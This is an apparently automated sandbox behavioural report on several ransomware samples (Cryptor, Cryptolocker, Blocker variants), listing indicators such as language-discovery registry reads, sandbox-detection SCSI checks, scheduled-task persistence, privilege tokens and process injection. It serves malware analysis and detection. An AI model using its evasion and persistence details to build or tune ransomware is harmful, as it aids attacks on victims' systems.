opened for modification 
C:\Windows\WinSxS\wow64_microsoft.powershel..resources.resources_31bf3856ad364e35_10.0.19041.1_es-es_41dcd20a820bff35\MSFT_WaitForAll.schema.mfl HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe -
Detects Pyinstaller 1 IoCs
Processes:
resource yara_rule
C:\Users\Admin\Desktop\00396\Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe pyinstaller
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exe, netsh.exe
description ioc process
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
cmd.exe, Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe, HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe, reg.exe, HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe, HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe, Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe, Trojan-Ransom.Win32.Blocker.mqdk-2d584363633271e192a32859582e72a6c7b084b32f582d8bc8fad3a240876cba.exe, cmd.exe, csrss.exe, HEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.exe, Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe
description ioc process
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.mqdk-2d584363633271e192a32859582e72a6c7b084b32f582d8bc8fad3a240876cba.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csrss.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exe, taskmgr.exe
description ioc process
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe
Modifies Control Panel 2 IoCs
Processes:
HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe
description ioc process
Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Desktop\WallpaperStyle = "6" HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe
Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Desktop\TileWallpaper = "0" HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe
Modifies data under HKEY_USERS 64 IoCs
Processes:
csrss.exe
description ioc process
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time" csrss.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" csrss.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exe, schtasks.exe
pid process
5816 schtasks.exe
5512 schtasks.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
taskmgr.exe, taskmgr.exe, powershell.exe
pid process
4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 4176 powershell.exe 4176 powershell.exe 4176 powershell.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
taskmgr.exe
pid process
2632 taskmgr.exe
Suspicious use of AdjustPrivilegeToken 16 IoCs
Processes:
7zFM.exe, taskmgr.exe, taskmgr.exe, powershell.exe, HEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.exe, HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe, Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe
description pid process
Token: SeRestorePrivilege 4324 7zFM.exe
Token: 35 4324 7zFM.exe
Token: SeSecurityPrivilege 4324 7zFM.exe
Token: SeDebugPrivilege 4820 taskmgr.exe
Token: SeSystemProfilePrivilege 4820 taskmgr.exe
Token: SeCreateGlobalPrivilege 4820 taskmgr.exe
Token: SeDebugPrivilege 2632 taskmgr.exe
Token: SeSystemProfilePrivilege 2632 taskmgr.exe
Token: SeCreateGlobalPrivilege 2632 taskmgr.exe
Token: 33 4820 taskmgr.exe
Token: SeIncBasePriorityPrivilege 4820 taskmgr.exe
Token: SeDebugPrivilege 4176 powershell.exe
Token: SeDebugPrivilege 3388 HEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.exe
Token: SeDebugPrivilege 2664 HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe
Token: SeImpersonatePrivilege 2664 HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe
Token: SeDebugPrivilege 1412 Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
7zFM.exe, taskmgr.exe, taskmgr.exe
pid process
4324 7zFM.exe 4324 7zFM.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
taskmgr.exe, taskmgr.exe
pid process
4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
cmd.exe
pid process
2780 cmd.exe
2780 cmd.exe
2780 cmd.exe
Suspicious use of WriteProcessMemory 45 IoCs
Processes:
taskmgr.exe, powershell.exe, cmd.exe, HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe, Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe, HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe, cmd.exe, HEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.exe, cmd.exe, cmd.exe
description pid process target process
PID 4820 wrote to memory of 2632 4820 taskmgr.exe taskmgr.exe
PID 4820 wrote to memory of 2632 4820 taskmgr.exe taskmgr.exe
PID 4176 wrote to memory of 2780 4176 powershell.exe cmd.exe
PID 4176 wrote to memory of 2780 4176 powershell.exe cmd.exe
PID 2780 wrote to memory of 3388 2780 cmd.exe HEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.exe
PID 2780 wrote to memory of 3388 2780 cmd.exe HEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.exe
PID 2780 wrote to memory of 3388 2780 cmd.exe HEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.exe
PID 2780 wrote to memory of 2664 2780 cmd.exe HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe
PID 2780 wrote to memory of 2664 2780 cmd.exe HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe
PID 2780 wrote to memory of 2664 2780 cmd.exe HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe
PID 2780 wrote to memory of 2668 2780 cmd.exe HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe
PID 2780 wrote to memory of 2668 2780 cmd.exe HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe
PID 2780 wrote to memory of 2668 2780 cmd.exe HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe
PID 2668 wrote to memory of 1252 2668 HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe cmd.exe
PID 2668 wrote to memory of 1252 2668 HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe cmd.exe
